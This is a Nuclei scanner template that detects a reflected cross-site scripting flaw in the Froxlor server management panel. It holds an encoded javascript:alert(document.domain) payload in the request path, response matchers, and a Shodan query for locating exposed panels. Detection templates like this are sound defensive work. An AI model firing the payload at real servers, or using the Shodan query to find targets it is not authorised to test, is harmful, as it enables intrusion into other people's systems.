nuclei-templates/vulnerabilities/froxlor-xss.yaml

36 lines
795 B
YAML

id: froxlor-xss
info:
name: Froxlor Server Management - Cross Site Scripting
author: tess
severity: medium
description: |
The user must click the forgot password link in order to execute this XSS.
metadata:
verified: true
shodan-query: title:"Froxlor Server Management Panel"
tags: froxlor,xss
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "javascript:alert(document.domain);dd//"
- "Froxlor"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200